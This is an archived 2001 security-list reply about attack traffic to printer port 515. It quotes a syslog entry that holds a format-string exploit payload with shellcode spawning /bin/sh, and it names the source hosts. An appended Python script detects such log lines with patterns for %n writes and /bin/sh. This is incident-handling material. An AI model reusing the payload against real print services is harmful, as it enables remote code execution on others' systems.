Re: Printer exploit?

From: Piotr Klaban (maklerat_private)
Date: Wed Jun 27 2001 - 05:02:21 PDT


    On Tue, Jun 26, 2001 at 02:32:05PM -0600, Brendan Murphy wrote:
    >    Has anyone heard of any exploits to LaserJet printers, or printers in
    > general that might cause this problem?  We've been through the gambit with
    > HP and nothing seems to match...
    
    We have got the problem with connections from several places to port 515.
    Our problem could be uncorrelated with yours. We'd block port 515,
    but maybe someone else also has such connections, and someone here
    knows someone abroad who can stop those hackers ...
    
    In the logs we have seen several hundred messages that look like this:
    
    Jun 27 13:36:37 azor bsd-gw[461]: [ID 315218 lpr.error] Invalid protocol request (66):
    BBB4\375\2775\375\2776\375\2777\375\277XXXXXXXXXXXXXXXXXX%.244u%300$n%.
    199u%301$n%.255u%302$n%.192u%303$n1\3331\3111\300F\315\3451
    \322f\3201\311\313C]\370C]\364KM\374M\364\3151\311E\364Cf]\354f\307E
    \356'M\360E\354E\370\306E\374\320M\364\315\320CC\315\320C\315\3031
    \311?\320\315\320A\315\353^u1\300FE\363MU\315\350\343/bin/sh
    
    If you run the command 'telnet localhost printer' (printer == 515)
    and write something, it would be logged with a similar message.
    
    I run the atmsnoop together with ethereal (to parse atmsnoop output files)
    and filter out the following connections so far:
    
     230 connections from k1.t4d116.voas.fi
     239 connections from pop-mu-1-1-dialup-7.freesurf.ch
    
    I do not have time to contact the ISPs (freesurf.ch and voas.fi)
    since I do not believe that they would do anything about those people.
    
    Best regards,
    
    -- 
    Piotr Klaban
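A defender-side check for the log pattern quoted above, added here as an example and not part of Piotr's message: it parses Solaris-style bsd-gw syslog lines and flags requests whose payload carries the positional %n write directives that distinguish a format-string attempt from an ordinary malformed request (such as a stray telnet session). The sample lines are constructed, with the shellcode bytes replaced by a placeholder.

```python
import re

# Constructed sample syslog lines modelled on the bsd-gw entries quoted in
# the message above; the shellcode bytes are replaced with a placeholder.
SAMPLE_LOG = """\
Jun 27 13:36:37 azor bsd-gw[461]: [ID 315218 lpr.error] Invalid protocol request (66): BBB4XXXXXXXXXXXXXXXXXX%.244u%300$n%.199u%301$n%.255u%302$n%.192u%303$n<shellcode bytes>/bin/sh
Jun 27 13:40:02 azor bsd-gw[470]: [ID 315218 lpr.error] Invalid protocol request (104): hello there
Jun 27 13:41:15 azor sshd[512]: [ID 800047 auth.info] Accepted publickey for admin from 192.0.2.10
"""

# Matches the syslog prefix and the lpr.error text seen in the quoted entry.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) bsd-gw\[(?P<pid>\d+)\]: "
    r"\[ID \d+ lpr\.error\] Invalid protocol request \((?P<code>\d+)\): (?P<payload>.*)$"
)
# A %<width>u padding directive followed by a positional %<k>$n write is the
# hallmark of a format-string exploit; random junk sent to port 515 has none.
FMT_WRITE_RE = re.compile(r"%\.?\d*u%\d+\$n")
SHELL_RE = re.compile(r"/bin/sh")

def classify(line):
    """Return None for lines that are not bsd-gw protocol errors, else a verdict dict."""
    m = LINE_RE.match(line)
    if not m:
        return None
    payload = m.group("payload")
    indicators = []
    if FMT_WRITE_RE.search(payload):
        indicators.append("positional-%n-write")
    if SHELL_RE.search(payload):
        indicators.append("/bin/sh")
    return {
        "ts": m.group("ts"),
        "host": m.group("host"),
        "code": int(m.group("code")),
        "verdict": "format-string-attempt" if indicators else "malformed-request",
        "indicators": indicators,
    }

def scan(text):
    """Classify every bsd-gw 'Invalid protocol request' line in a syslog excerpt."""
    return [r for r in (classify(line) for line in text.splitlines()) if r]

if __name__ == "__main__":
    for result in scan(SAMPLE_LOG):
        print(result)
```

Feeding the real /var/adm/messages through scan() gives a count per verdict, so the noise from innocent port probes can be separated from the entries worth reporting to the source ISP.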
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 18:11:28 PDT